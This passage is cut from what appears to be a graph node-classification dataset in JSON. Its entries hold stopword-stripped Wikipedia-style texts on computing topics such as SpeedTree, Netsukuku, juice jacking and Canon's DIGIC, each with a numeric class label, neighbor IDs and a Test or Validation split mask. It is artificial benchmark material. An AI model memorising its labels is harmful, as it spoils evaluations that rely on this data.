c++ sdk efficiently handles rendering speedtree-generated trees forests engine designed integrate operate within larger game engine ready-made support unreal engine unity ogre engine contains optimized systems cull off-screen trees determine level detail on-screen trees full source code available licensees use video games real-time applications modification engine supported engine built work microsoft windows mac os x xbox playstation playstation vita idv licensed middleware partner playstation 3 playstation 4 xbox 360 xbox one idv partnered epic games order integrate software epic unreal engine 4 unreal engine 3 free udk engine released november 2009 partnerships also formed idv bigworld tech vision engine havok multiverse network gamebryo engine emergent game technologies ogre open-source rendering engine torus knot speedtree games licensed first video games including december 2002 speedtree licensed pc next-generation console titles wide variety genres studios used speedtree published games featuring technology include selected recent upcoming and/or popular titles featuring speedtree games following release speedtree cinema 2009 speedtree saw first major cinematic use 2009 avatar technology provided vegetation flyover planet pandora first frames movie well scenes known movies television productions featuring speedtree include speedtree used following real-time projects offerings",
    "neighbors": [
      8122,
      8454,
      8937,
      3210,
      11306,
      6797,
      7983,
      6900,
      2293,
      4182,
      823,
      9691,
      8185,
      5914,
      5083,
      1916,
      11700
    ],
    "mask": "Test"
  },
  {
    "node_id": 2827,
    "label": 5,
    "text": "Connectionless_communication:connectionless communication connectionless communication often referred cl-mode communication data transmission method used packet switching networks data unit individually addressed routed based information carried unit rather setup information prearranged fixed data channel connection-oriented communication connectionless communication two network end points message sent one end point another without prior arrangement device one end communication transmits data addressed without first ensuring recipient available ready receive data protocols allow error correction requested retransmission internet protocol ip user datagram protocol udp connectionless protocols packet transmitted connectionless mode frequently called datagram connectionless protocols usually described stateless protocols end points protocol-defined way remember conversation message exchanges connection-oriented communication communicating peers must first establish logical physical data channel connection dialog preceding exchange user data connectionless communication advantage connection-oriented communication low overhead also allows multicast broadcast operations data transmitted several recipients single transmission connectionless transmissions service provider usually guarantee loss error insertion misdelivery duplication out-of-sequence delivery packet however effect errors may reduced implementing error correction within application protocol connectionless mode optimizations possible sending several data units two peers establishing connection beginning data exchange components routers bridges along network path would able pre-compute hence cache routing-related information avoiding re-computation every packet network components could also reserve capacity transfer subsequent data units video download example distinction connectionless connection-oriented transmission may take place several layers osi reference model",
    "neighbors": [
      5472,
      4546,
      2339,
      8905,
      10924,
      2701,
      4589,
      6512,
      1586,
      2996,
      11413,
      5402,
      5531,
      5469,
      5439
    ],
    "mask": "None"
  },
  {
    "node_id": 2828,
    "label": 2,
    "text": "H1droid:h1droid h1droid project started vodafone sold samsung h1 mobile phones running limo operating system mobile phones running limo operating system applications also available limitation samsung h1 owners wanted run phone famous android operating system since phone good hardware attributes limo operating system also shared characteristics android could good platform operating system transformation idea group software enthusiast shared ideas blogsites world developed h1droid distributed internet software still development stage bugs ongoing h1droid android port samsung h1/gt-i8320/protector first steps porting android samsung h1 made ius netherlands k0059 china chinese programmer known mephisto continued k0059 work porting lot features like wifi improving power management mephisto faced many problems mainly related samsung libraries gave project people involved project recent updates made user called r3d4 https //github.com/r3d4/ ius currently working rewriting libsamsung-ipc support samsung h1 https //github.com/ius/ moment runs micro sd card means ca n't run samsung movinand however stills work fast microsd card currently using android 2.3.7 gingerbread working working bugs find games working working moment games tested samsung h1/gt-i8320/protector best install motorola droid 2 games/apps gpu samsung h1/gt-i8320/protector note moment bug 0.5.1 gameloft opening movies half sided n't worry wo n't affect gameplay n't want revert 0.5.0 find emulators working working moment games tested samsung h1/gt-i8320/protector",
    "neighbors": [
      4995,
      5892,
      7428,
      1670,
      9610,
      5262,
      8719,
      10129,
      5522,
      1427,
      7700,
      10645,
      280,
      10009,
      10393,
      7835,
      9244,
      10525,
      798,
      11294,
      288,
      673,
      2978,
      2852,
      8486,
      1191,
      1959,
      937,
      1578,
      5546,
      7595,
      5677,
      8870,
      7983,
      10537,
      3380,
      5431,
      1083,
      2875,
      3900,
      10045,
      196,
      69,
      6212,
      8262,
      11082,
      8907,
      332,
      4685,
      3664,
      2001,
      3409,
      8019,
      2901,
      8280,
      5467,
      8285,
      8413,
      479,
      9949,
      2658,
      3940,
      1255,
      1516,
      5100,
      8940,
      11252,
      7548,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2829,
    "label": 7,
    "text": "Netsukuku:netsukuku netsukuku name experimental peer-to-peer routing system developed freaknet medialab 2005 created build distributed network anonymous censorship-free fully independent necessarily separated internet without support server isp central authority netsukuku designed handle 2 nodes without servers central systems minimal cpu memory resources mesh network built using existing network infrastructure components wi-fi project slow development since 2005 never abandoning beta state also never tested large scale december 2011 latest theoretical work netsukuku found author master thesis scalable mesh networks address space balancing problem following description takes account basic concepts theory netsukuku uses custom routing protocol called qspn quantum shortest path netsukuku strives efficient taxing computational capabilities node current version protocol qspnv2 adopts hierarchical structure 256 nodes grouped inside gnode group node 256 gnodes grouped single ggnode group group nodes 256 ggnodes grouped single gggnode offers set advantages main documentation protocol relies fact nodes mobile network structure change quickly several minutes may required change network propagated however node joins network immediately able communicate using routes neighbours node joins mesh network netsukuku automatically suits nodes come know fastest efficient routes communicate newcomer nodes privileges restrictions nodes domain name system dns replaced decentralised distributed system called andna netsukuku domain name architecture andna database included netsukuku system node includes database occupies 355 kilobytes memory simplifying andna works follows resolve symbolic name host applies function hash behalf hash function returns address host contacts asking resolution generated hash contacted node receives request searches andna database address associated name returns applicant host recording similar way example let suppose node x record address freaknet.andna x calculates hash name obtains address 11.22.33.44 associated node node x contacts requiring registration 11.22.33.44 hash stores request database request resolution 11.22.33.44 hash answer x address protocol obviously complex system provides public/private key authenticate hosts prevent unauthorized changes andna database furthermore protocol provides redundancy database make protocol resistant failures also provides migration database network topology changes protocol provide possibility revoking symbolic name certain period inactivity currently 3 days simply deleted database protocol also prevents single host record excessive number symbolic names present 256 names order prevent spammers store high number terms commonly used perform actions cybersquatting",
    "neighbors": [
      7232,
      8640,
      8674,
      5382,
      9098,
      1776,
      5978
    ],
    "mask": "Test"
  },
  {
    "node_id": 2830,
    "label": 9,
    "text": "Euclid_(programming_language):euclid programming language euclid imperative programming language writing verifiable programs designed butler lampson associates xerox parc lab mid-1970s implementation led ric holt university toronto james cordy principal programmer first implementation compiler originally designed motorola 6809 microprocessor considered innovative time compiler development team 2 million budget 2 years commissioned defense advanced research projects agency u.s. department defense canadian department national defence used years i. p. sharp associates mitre corporation sri international various international institutes research systems programming secure software systems euclid descended pascal programming language functions euclid closed scopes may side effects must explicitly declare imports euclid also disallows gotos floating point numbers global assignments nested functions aliases none actual parameters function refer thing euclid implements modules types descendants euclid include mesa programming language concurrent euclid programming language turing programming language",
    "neighbors": [
      1952,
      9345,
      2820,
      7494,
      8524,
      4341,
      7158,
      11132,
      6558
    ],
    "mask": "Test"
  },
  {
    "node_id": 2831,
    "label": 0,
    "text": "Chart_parser:chart parser computer science chart parser type parser suitable ambiguous grammars including grammars natural languages uses dynamic programming approach—partial hypothesized results stored structure called chart re-used eliminates backtracking prevents combinatorial explosion chart parsing generally credited martin kay common approach use variant viterbi algorithm earley parser type chart parser mainly used parsing computational linguistics named inventor another chart parsing algorithm cocke-younger-kasami cyk algorithm chart parsers also used parsing computer languages earley parsers particular used compiler compilers ability parse using arbitrary context-free grammars eases task writing grammar particular language however lower efficiency led people avoiding compiler work bidirectional chart parsing edges chart marked direction either forwards backwards rules enforced direction edges must point order combined edges incremental chart parsing chart constructed incrementally text edited user change text resulting minimal possible corresponding change chart chart parsers distinguished top-down bottom-up well active passive",
    "neighbors": [
      1890,
      9796,
      2316,
      1552,
      3668,
      5399,
      4350
    ],
    "mask": "None"
  },
  {
    "node_id": 2832,
    "label": 9,
    "text": "Henry_Baker_(computer_scientist):henry baker computer scientist henry givens baker jr. american computer scientist made contributions garbage collection functional programming languages linear logic also one founders symbolics company designed manufactured line lisp machines 2006 recognized distinguished scientist association computing machinery notable research garbage collection particularly baker real-time copying collector actor model baker received b.sc 1969 s.m 1973 e.e 1973 ph.d. 1978 degrees m.i.t",
    "neighbors": [
      2304,
      10584,
      9490,
      1783,
      10104,
      2105
    ],
    "mask": "Test"
  },
  {
    "node_id": 2833,
    "label": 5,
    "text": "Open_Phone_Abstraction_Library:open phone abstraction library field voip networking open phone abstraction library opal continues open-source openh323 project support wide range commonly used protocols used send voice video fax data ip networks rather tied h.323 protocol initially 2007 opal supported h.323 session initiation protocol sip protocols grown include asterisk iax2 opal implements wide range voice ip voip protocols voice video fax data ip networks written c++ released mozilla public licence opal utilises ptlib portable library allows opal run variety platforms including unix/linux/bsd macosx windows windows mobile embedded systems opal developed derivative openh323 library opal used open source video conferencing program ekiga formerly gnomemeeting",
    "neighbors": [
      5472,
      2804,
      10271,
      7407
    ],
    "mask": "Test"
  },
  {
    "node_id": 2834,
    "label": 7,
    "text": "Cluster_manager:cluster manager cluster manager usually backend graphical user interface gui command-line software runs one cluster nodes cases runs different server cluster management servers .the cluster manager works together cluster management agent agents run node cluster manage configure services set services manage configure complete cluster server see super computing cases cluster manager mostly used dispatch work cluster cloud perform last case subset cluster manager remote desktop application used configuration send work get back work results cluster cases cluster related availability load balancing computational specific service clusters",
    "neighbors": [
      11041,
      4194,
      7746,
      8194,
      1480,
      8810,
      4526,
      4149,
      1049
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2835,
    "label": 8,
    "text": "AlterGeo:altergeo altergeo formerly known wi2geo russian company specializing development global hybrid positioning system combines wi-fi wimax gsm gps lte ip address network environment approaches also created cross-platform location-based services gvidi altergeo hyperlocal banner ad system local hero according financial times altergeo one four russia next tech titans company named winner finalist multiple domestic international awards field technology media currently skolkovo innovation center resident received funding several prominent investors including intel capital esther dyson altergeo established 2008 build wi-fi positioning technology basis phd thesis one founders long company goal develop universal solution could overcome limitations satellite systems gps a-gps glonass team expanded r activities developed global hybrid system positioning electronic devices wifi wimax gsm lte ip addresses network environment altergeo claim system significant coverage europe especially russia cis asia well north south america claim operate database 135 million wi-fi wimax gsm lte active access points processing 400 million location requests positioning 100 million devices world daily basis accuracy 20–30 metres hybrid system 500–1,000 metres ip-based positioning altergeo hybrid positioning system allows web mobile software developers well device manufacturers position users order provide location-aware features collect relevant location-based statistics marketing issues company also developed specific solutions precise location-based advertising targeting retargeting rtb etc indoor positioning altergeo system accessed api sdk deployed client side on-premises solution used badoo mail.ru 2gis livejournal prominent internet companies 2011 one russia largest advertising networks begun first russia launch location-based contextual advertising service thanks cooperation altergeo december 2014 altergeo released local hero self-service hyperlocal banner advertising system local businesses claims able publish customers banners throughout internet via several rtb ad exchanges display desktop mobile devices within small geographic areas minimum radius 500 meters demonstrate example alternative positioning system implemented field web mobile services wide audiences company started developing b2c location-based services launched 2008 location-based service altergeo began relatively simple friend-to-friend location-sharing service also allows people find places around give receive advice get various special offers e.g discount coupons restaurants shops places altergeo currently reported leading cross-platform location-based social network whole russian-speaking world 1.2 million people using website free mobile apps ios android windows phone additionally supplied augmented reality feature bada according techcrunch 2012 company realised sitting lot interesting data could applied restaurants released say 'intelligent restaurant guide gvidi free mobile app ios android based sophisticated recommendation system gvidi meaning guide head lead direct conduct combines directory restaurants cafes etc use social media try determine suitable user system monitors user social graphs facebook twitter altergeo vkontakte foursquare etc. well current location make recommendations restaurants cafes bars filtered across multiple criteria wi-fi 24/7 playground non-smoking table booking special offers also available altergeo winner techcrunch europas 2013 received best russian startup nomination company also bully awards 2012 named finalist red herring top 100 global red herring top 100 europe lists 2013 financial times listed altergeo among four russia next tech titans together yandex ozon ecwid whereas informilo included russia top 25 hottest tech companies list one year earlier altergeo recognized creation intelligent mobile restaurant search engine gvidi bully awards 2013 breakthrough technology-based product 2nd apps4all contest best app using google services named best idea project international tactrick android developer cup brands altergeo gvidi given highest possible index aaa russian startup rating top section",
    "neighbors": [
      10080,
      5612,
      2901,
      10020
    ],
    "mask": "None"
  },
  {
    "node_id": 2836,
    "label": 7,
    "text": "Mozilla_Skywriter:mozilla skywriter mozilla skywriter formerly bespin mozilla labs project aiming create open extensible interoperable web-based framework code editing january 2011 merged ajax.org ace cloud9 ide projects original name reference bespin fictional gas giant star wars cloud city located relates cloud computing nature project time preceding 1.0 release name project changed skywriter due many compliments complaints previous one new name also holds reference coding cloud environment skywriter encourages shared environment data accessed machine allows developers collaborate projects unified interface accessed web browser matter physically located application available anyone free registration website skywriter currently supports syntax highlighting html css php python c c ruby javascript wiring used arduino platform",
    "neighbors": [
      1664,
      637,
      3462,
      6791,
      9736,
      6797,
      1295,
      7951,
      10006,
      11418,
      9245,
      9757,
      7983,
      1713,
      7861,
      823,
      11449,
      5054,
      9152,
      9281,
      8644,
      10057,
      2893,
      7889,
      5078,
      6231,
      10078,
      482,
      4194,
      10722,
      8169,
      8554,
      10860,
      6133,
      7543,
      4728,
      5114,
      8443,
      2045,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 2837,
    "label": 4,
    "text": "Juice_jacking:juice jacking juice jacking type cyber attack involving charging port doubles data connection typically usb often involves either installing malware surreptitiously copying sensitive data smart phone tablet computer device wall sheep event defcon set allowed public access informational juice jacking kiosk year defcon since 2011 intent bring awareness attack general public informational juice jacking kiosks set wall sheep village included hidden cpu used way notify user plug devices public charging kiosks first informational juice jacking kiosk included screen would change free charging station warning message user trust public charging stations devices one researchers designed charging station wall sheep given public presentations showcase malicious acts could taken via kiosk data theft device tracking information compromising existing charging kiosks security researcher kyle osborn released attack framework called p2p-adb 2012 utilized usb on-the-go connect attacker phone target victim device framework included examples proof concepts would allow attackers unlock locked phones steal data phone including authentication keys granting attacker access target device owner google account security researcher graduates students georgia institute technology georgia tech released proof concept malicious tool mactans utilized usb charging port apple mobile devices 2013 blackhat usa security briefings utilized inexpensive hardware components construct small sized malicious wall charger could infect iphone then-current version ios malicious software charged software could defeat security measures built ios mask way apple masks background processes ios security researchers karsten nohl jakob lell srlabs published research badusb 2014 blackhat usa security briefings presentation attack mentions cellphone tablet device charging infected computer would one simplest method propagating badusb vulnerability include example malicious firmware code would infect android devices badusb researchers aries security wall sheep later revisited juice jacking concept 2016 set video jacking charging station able record mirrored screen phones plugged malicious charging station affected devices time included android devices supporting slimport mhl protocols usb well recent iphone using lightning charge cable connector researchers symantec disclosed findings attack dubbed trustjacking 2018 rsa conference researchers identified user approves access computer ios device usb trusted access level also applied devices itunes api accessible wifi would allow attackers access ios device even user unplugged device malicious infected usb based charge source brian krebs first report attack coined term juice jacking seeing informational cell phone charging kiosk set wall sheep defcon 19 august 2011 wrote first article security journalism site krebs security wall sheep researchers—including brian markus joseph mlodzianowski robert rowley—designed kiosk information tool bring awareness potential attack vector discussed released tools publicly perform malicious actions charging devices episode hacking series hak5 released september 2012 showcased number attacks utilized using attack framework named p2p-adb released kyle osborn p2p-adb attack framework discussed utilized one phone attack another phone usb go connection late 2012 document released nsa warning government employees travel threat juice jacking reminding reader overseas travel use personal power charging cables charge public kiosks utilizing people computers android hackers handbook released march 2014 dedicated sections discussing juice jacking adb-p2p framework juice jacking central focus episode season 1 episode 9 l0m1s aired april 2015 apple ios taken multiple security measures reduce attack surface usb including longer allowing device automatically mount hard drive plugged usb well release security patches vulnerabilities exploited mactans android devices commonly prompt user allowing device mounted hard drive plugged usb since release 4.2.2 android implemented whitelist verification step prevent attackers accessing android debug bridge without authorization juice jacking possible device charged via ac adapter shipped device battery backup device utilizing usb cable data cables removed tool originally called usb condom renamed syncstop released sole purpose disallowing data connections passed usb cable",
    "neighbors": [
      9569,
      2658,
      2275,
      9732,
      8805,
      9356,
      7515,
      7899
    ],
    "mask": "None"
  },
  {
    "node_id": 2838,
    "label": 3,
    "text": "Mali_(GPU):mali gpu mali series graphics processing units gpus multimedia processors semiconductor intellectual property cores produced arm holdings licensing various asic designs arm partners mali gpus developed falanx microsystems a/s spun research project norwegian university science technology arm holdings acquired falanx microsystems a/s june 23 2006 renamed company arm norway like embedded ip cores 3d rendering acceleration mali gpu include display controllers driving monitors contrast common desktop video cards instead mali arm core pure 3d engine renders graphics memory passes rendered image another core handle display arm however license display controller sip cores independently mali 3d accelerator sip block e.g mali dp500 dp550 dp650 arm also supplies tools help authoring opengl es shaders named mali gpu shader development studio mali gpu user interface engine display controllers arm hdlcd display controller available separately mali core grew cores previously produced falanx currently constitute microarchitectures chips support cache coherency l2 cache cpu adaptive scalable texture compression astc supported mali-t620 t720/t760 t820/t830/t860/t880 mali-g series mali gpu variants found following systems chips socs mali video name given arm holdings dedicated video decoding video encoding asic multiple versions implementing number video codecs hevc vp9 h.264 vp8 arm products mali video processor semiconductor intellectual property core licensed third parties inclusion chips real time encode-decode capability central videotelephony interface arm trustzone technology also built-in enable digital rights management copyrighted material first version mali video processor v500 released 2013 mali-t622 gpu v500 multicore design sporting 1–8 cores support h.264 protected video path using arm trustzone 8 core version sufficient 4k video decode 120 frames per second fps v500 encode vp8 h.264 decode h.264 h.263 mpeg4 mpeg2 vc-1/wmv real vp8 released mali-t800 gpu arm v550 video processors added encode decode hevc support 10-bit color depth technologies reduced power consumption v550 also included technology improvements better handle latency save bandwidth built around idea scalable number cores 1–8 v550 could support 1080p60 1 core 4k120 8 cores v550 supported hevc main h.264 vp8 jpeg encode hevc main 10 hevc main h.264 h.263 mpeg4 mpeg2 vc-1/wmv real vp8 jpeg decode mali v61 video processor formerly named egil released mali bifrost gpu 2016 v61 designed improve video encoding particular hevc vp9 allow encoding either single multiple streams simultaneously design continues 1–8 variable core number design single core supporting 1080p60 8 cores drive 4kp120 decode encode vp9 10-bit vp9 8-bit hevc main 10 hevc main h.264 vp8 jpeg decode mpeg4 mpeg2 vc-1/wmv real h.263 mali v52 video processor released mali g52 g31 gpus march 2018 processor intended support 4k including hdr video mainstream devices mali v76 video processor released mali g76 gpu cortex-a76 cpu 2018 v76 designed improve video encoding decoding performance design continues 2–8 variable core number design 8 cores capable 8kp60 decoding 8kp30 encoding relative v61 support added 10-bit hdr h.264 encode decode however av1 codec supported mali-d71 added arm framebuffer compression afbc 1.2 encoder support arm corelink mmu-600 assertive display 5 assertive display 5 support hdr10 hybrid log-gamma hlg mali-d77 added features including asynchronous timewarp atw lens distortion correction ldc chromatic aberration correction cac mali-d77 also capable 3k 2880x1440 120hz 4k 90hz april 25th 2017 mali-c71 announced arm first image signal processor isp january 3th 2019 mali-c52 c32 announced aimed everyday devices including drones smart home assistants security internet protocol ip camera january 21 2012 phoronix reported luc verhaegen driving reverse-engineering attempt aimed mali series gpus specifically mali 200 mali 400 versions project known lima support opengl es 2.0 reverse-engineering project presented fosdem february 4 2012 followed opening website demonstrating renders february 2 2013 verhaegen demonstrated quake iii arena timedemo mode running top lima driver may 2018 lima developer posted driver inclusion linux kernel may 2019 lima driver part mainline linux kernel panfrost reverse-engineered driver effort mali txxx midgard gxx bifrost gpus introducing panfrost talk presented x.org developer conference 2018 may 2019 panfrost driver part mainline linux kernel",
    "neighbors": [
      6659,
      644,
      11396,
      8327,
      9741,
      398,
      11405,
      11282,
      9235,
      7833,
      666,
      7835,
      9115,
      10361,
      2594,
      6818,
      10658,
      7077,
      9126,
      810,
      8237,
      3511,
      4024,
      8250,
      7998,
      8383,
      7745,
      8514,
      7747,
      9155,
      6981,
      2635,
      1614,
      9042,
      344,
      10971,
      6495,
      11487,
      3043,
      2788,
      3301,
      1387,
      8812,
      9964,
      5358,
      10734,
      2036,
      4596,
      6391,
      6009,
      508,
      638
    ],
    "mask": "None"
  },
  {
    "node_id": 2839,
    "label": 3,
    "text": "VMac:vmac vmac open source emulator mac os windows dos os/2 nextstep linux-unix platforms although vmac abandoned mini vmac improved spinoff vmac currently developed vmac mini vmac emulate macintosh plus run apple macintosh system versions 1.1 7.5.5. vmac mini vmac support cpu emulation motorola 68000 68040 display output sound floppy disk insert hfv image files vmac ports include extra features cd-rom support basic serial port scc support gemulator rom board support various performance improvements although website still operation vmac development slowed halt 1999 official releases made since many developer e-mail addresses listed website currently working mini vmac vmac spinoff still maintained developed paul c. pratt currently mini vmac supports macintosh 128k 512k 512ke plus se classic active development macintosh ii macintosh portable powerbook 100 support due complaints rarity original ii also accepts macintosh iix macintosh se/30 rom files precompiled versions available download mini vmac sourceforge project emulates macintosh plus 4 mib ram vmac mini vmac require macintosh plus rom file macintosh system software work macintosh rom files owned apple legally distributed however windows unix ports vmac mini vmac support gemulator rom board emulators inc. allows users add genuine macplus rom chips x86 machine via isa expansion slot board also support rom chips early macintosh systems publicly released versions vmac supported macintosh plus macintosh system software available apple support downloads website see external links mentioned mini vmac also requires specific rom image computer emulation desired software application 68000 macs may downloaded mini vmac website retrieval system rom image along complete tutorial locating old mac retrieving rom working disk images",
    "neighbors": [
      11649,
      4741,
      7305,
      2058,
      6797,
      6165,
      7830,
      4910,
      7983,
      823,
      576,
      10691,
      11513,
      4807,
      8540,
      8544,
      7269,
      6377,
      1776,
      5492,
      2551,
      2553
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2840,
    "label": 2,
    "text": "CPMulator:cpmulator cpmulator program emulate cp/m operating system x86 dos program developed 1984 keystone software development company owned operated jay sprenkle nec v20 processor released year guaranteed hardware compatible intel 8088 reviewing instruction timing math operations instruction addressing hardware determined could slightly speed existing 8088 based ibm pc machines keystone software started advertising pc speedup kits pcweek magazine cpu socketed ibm pc could easily replaced practice programs received 5 speed increase math intensive much improved one customer reported monte carlo simulation nuclear reactor much faster double checked results could n't believe finished cpmulator developed release v20 processor also able emulate intel 8080 instruction set hardware opened possibility running older code new ibm machines cpmulator designed modify cp/m binaries make run native 8088 dos programs code put cpu emulation mode prefixed cp/m executable calls cp/m operating system intercepted translated dos operating system calls program would leave 8080 emulation mode make operating system call translate results cp/m standards returned emulation mode continue original program product went production class machines became prevalent nec produced v series pin pin compatible version 80286 processor",
    "neighbors": [
      10113,
      6921,
      3216,
      2201,
      2729,
      7849,
      11562,
      178,
      4409,
      7999,
      4548,
      10067,
      10083,
      5220,
      2672,
      3056,
      4337,
      9329,
      4727,
      11513,
      6778
    ],
    "mask": "Test"
  },
  {
    "node_id": 2841,
    "label": 8,
    "text": "Ourproject.org:ourproject.org ourproject.org op web-based collaborative free content repository acts central location construction maintenance social/cultural/artistic projects providing web space tools focusing free knowledge claims extend ideas methodology free software social areas free culture general since september 2009 ourproject comunes association umbrella gave birth kune collaborative social network groups ourproject founded 2002 aims hosting boosting cooperative work done multiple domains cultural artistic educational one specific condition results projects remain freely accessible free license understood broad way available licenses cataloged free/libre several creative commons licenses non-profit perspective partially imposed online community projects advertising allowed hosted webpages thus ourproject projects mainly carried social movements university-supported groups free software related projects cooperatives artist collectives activist groups informal groups non-profits december 2016 ourproject.org hosting 1,733 projects 5,969 users constant linear growth rate pagerank 6 14th position public gforge sites first restricted free software projects fact gnu project highlights free knowledge free culture project claims successful wiki farm full free version without ads comparison presence especially spain latin america china relevant projects using ourproject infrastructure include 2011 attracted interest new wave protesting social movements several areas ourproject.org uses multi-language multiple-topic adapted version fusionforge aim widen spectrum free software ideals focusing free social cultural projects free software thus software originally kind social multiple-topic sourceforge following free culture movement nowadays ourproject community involved development collaborative environment kune eventually would cover current ourproject functionalities main condition hosting projects op content created project must released one licenses op provides several free internet services free/libre projects collaborators secondary services 9 years existence ourproject developed partnership several organizations",
    "neighbors": [
      7364,
      1668,
      10341,
      4919,
      7022,
      11602,
      5687
    ],
    "mask": "Test"
  },
  {
    "node_id": 2842,
    "label": 7,
    "text": "New_Relic:new relic new relic american software analytics company based san francisco california lew cirne founded new relic 2008 company ceo name new relic anagram founder lew cirne name february 2013 new relic nr raised 80 million investors including insight venture partners t. rowe price benchmark capital allen company trinity ventures passport capital dragoneer tenaya capital valuation 750 million funding round helped new relic extend software analytics platform include android ios native mobile apps april 2014 new relic raised another 100 million funding led blackrock inc. passport capital participation t. rowe price associates inc. wellington management board members peter fenton benchmark dan scholnick trinity ventures peter currie currie capital adam messinger twitter sarah friar square lew cirne new relic went public december 12 2014 new relic technology delivered software service saas model announced 2013 monitors web mobile applications real-time support custom-built plugins collect arbitrary data partnerships include ibm bluemix amazon web services cloudbees engine yard heroku joyent rackspace hosting microsoft azure well mobile application backend service providers appcelerator parse stackmob marketing mentions november 5 2012 ca technologies formerly computer associates filed lawsuit us district court eastern district new york lawsuit claims new relic violated three patents came ca technologies possession acquisitions three patents question numbers b2 b1 b2 first two actions ca technologies filed connection alleged infringement patents obtained acquisition wily technology company also founded lew cirne april 2013 ca technologies filed lawsuit asserting patent infringement three apm patents software developer appdynamics however april 20 2015 appdynamics ca settled two-year-old patent dispute appdynamics said paid modest fixed payment",
    "neighbors": [
      11429,
      9179,
      8269,
      1935,
      7248,
      8495,
      9202,
      467,
      9297,
      10266,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 2843,
    "label": 3,
    "text": "DIGIC:digic digital imaging integrated circuit often styled dig c canon inc. name family signal processing control units digital cameras camcorders digic units used image processors canon digital imaging products several generations digics exist distinguished version number suffix currently digic implemented application-specific integrated circuit asic designed perform high speed signal processing well control operations product incorporated numerous generations digic evolved system involving number discrete integrated circuits single chip system many based around arm instruction set custom firmware units developed add features cameras original digic used powershot g3 sep 2002 canon s1 mar 2004 a520 mar 2005 cameras consists three separate chips video processing ic image processing ic camera control ic digic ii single chip system introduced 2004 unlike first digic allowed compact designs digic ii also improved upon original adding larger buffer increasing processing speed used advanced consumer-level cameras many discontinued digital slrs canon eos 5d canon eos 30d digic ii uses high-speed ddr-sdram improves startup time af performance write memory card speeds 5.8 mb/sec additionally canon claims digic ii improves color sharpness automatic white balance cmos sensor digital slr camera line digic iii image processor introduced 2006 advertised deliver improved image quality faster operation extended battery life compared predecessor digic iii provides faster interface sd memory card canon powershot g7 g9 sd750 sd800 sd850 sd900 sd 1000 a560 a570 a590 a650 a720 a495 eos xs/1000d eos xsi/450d eos 40d eos 1d mark iii eos 1ds mark iii s5 also provides higher resolution lcd screens additionally 14-bit converter providing greater bit depth previous versions digic iii provides face detection af/ae finds tracks nine faces controls exposure flash ensure proper illumination faces well rest frame reducing detrimental effect overexposed darkened faces photo reverts aiaf system subject either detected deemed subject based isaps database latter useful tourist spots may many people around intended subject scene isaps scene-recognition technology developed canon digital cameras using internal database thousands different photos isaps also works digic iii image processor improve focus speed accuracy well exposure white balance canon eos-1d mark iii uses dual digic iii processors achieve capture rate 10 frames per second 10.1 mp maximum burst 110 jpeg images depending speed attached storage canon eos-1ds mark iii also uses dual digic iii processors achieve capture rate five frames per second 21.1 mp 2008 canon introduced digic 4 processor used eos 1100d/rebel t3 eos 500d/rebel t1i eos 550d/rebel t2i eos 600d/rebel t3i eos 50d eos 60d eos 1200d/rebel t5 eos 5d mark ii eos-1d x metering af also used newer cameras canon powershot lines g sd sx canon claims improvements dual digic 4 processors used eos 7d eos-1d mark iv cpu introduced 2014 replace digic 5 mid-range compact cameras particularly elph/ixus sx series full specifications made available introduction canon claims 60 speed bump original digic 4 2011 canon introduced digic 5 featured canon compact cameras like powershot sx40 hs achieve capture rate 10.3 frames per second full resolution high-speed burst hq full hd 1080p videos intelligent image stabilization canon claims new digic 5 processor six times faster digic 4 processor efficiently manages increase scene information simultaneously reduces appearance image noise 75 according canon digic 5 analyses four times image information create pixel recording detail colour scene ever digic 5 co-designed texas instruments ti manufactured ti foundry partnership asia using 45 nm node technology fanned ti digic 5 used eos 650d/rebel t4i/kiss x6i eos 700d/rebel t5i/kiss x7i canon eos eos 100d/rebel sl1/kiss x7 well powershot cameras canon powershot n s100 s110 g15 canon powershot sx50 hs digic 5+ enhancement digic 5 digic 4 performance said 17x performance digic 4 additional processing power allows higher frame rate continuous shooting burst modes greater noise correction use signal processing digic 5+ used eos-1d x eos 6d eos 5d mark iii eos 70d eos-1d x includes dual digic 5+ processors allowing capture rate 12 frames per second raw jpeg additional digic 4 processor specifically intelligent subject analysis system introduced 2013 digic 6 image processor enables improved low-light performance iso 6400 reduced noise addition enables improved af times reduced lag previous models improved performance allows shots 14 fps advancements attributed digic 6 experienced movie mode records mp4 format doubles frame-rate 60 fps 1080p also features reduced noise 30 fps improved image stabilization digic 6 used eos 750d/rebel t6i eos 760d/rebel t6s eos 80d powershot g16 powershot n100 powershot s120 powershot sx270 hs powershot sx280 hs powershot sx60 hs powershot sx700 hs powershot sx710 hs powershot sx720 hs february 2014 canon also released compact canon powershot g1 x mark ii released newest compact mirrorless canon eos m3 february 2015 canon eos m10 october 2015 also utilize internal wlan 802.11b/g/n canon eos 5d mark iv includes digic 6+ processor canon eos 7d mark ii includes dual digic 6 processors allowing capture rate 10 frames per second raw jpeg additional digic 6 processor specifically intelligent subject analysis system canon eos 5ds eos 5ds r also use dual digic 6 processors capability shoot five 50.6mp frames per second canon eos-1d x mark ii includes dual digic 6+ processors allowing capture rate 170 consecutive raw images 14 fps 4k video 60 fps introduced 2016 canon powershot g7 x mark ii first canon camera include digic 7 processor following cameras also using processor mirrorless interchangeable lens camera canon eos m5 introduced 2016 canon eos 77d canon eos 800d introduced february 2017 announced february 2017 canon eos m6 canon eos 6d mark ii released july 2017 canon eos 200d known eos rebel sl2 americas eos kiss x8 japan released july 2017 currently last series canon eos m100 released august 2017 digic 8 introduced together canon eos m50 february 2018 process 4k videos 30 fps using mpeg-4 avc/h.264 compression cameras using processor include digic dv used canon single-chip ccd digital camcorders well dc20 dc40 dvd camcorders digic dv ii utilizes hybrid noise reduction system new gamma system processor used canon high-definition camcorders exception dc20 dc40 dvd camcorders including new sd camcorders fs100 fs10 fs11 digic dv iii processor used legria pal /vixia ntsc high-definition hfs100 hfs10 hf200 hf20 digic dv iii also incorporated cinema eos line digital cinema camera commencing c300 late 2011 digic dv 4 processor introduced 2013 vixia/legria g r mini series camcorders well year xa-20 -25 professional camcorders canon claims capable recording simultaneous mp4 avchd video streams digic dv 5 first seen canon xc10 canon eos c300 mark ii announced 8 april 2015 right nab show xc10 uses single digic dv 5 c300 mark ii uses dual digic dv 5 implementation capable 4k 24 25 30fps 4:2:2 color sampling xf-avc h.264 codec digic dv 6 used canon eos c200 announced may 31 2017 c200 uses dual 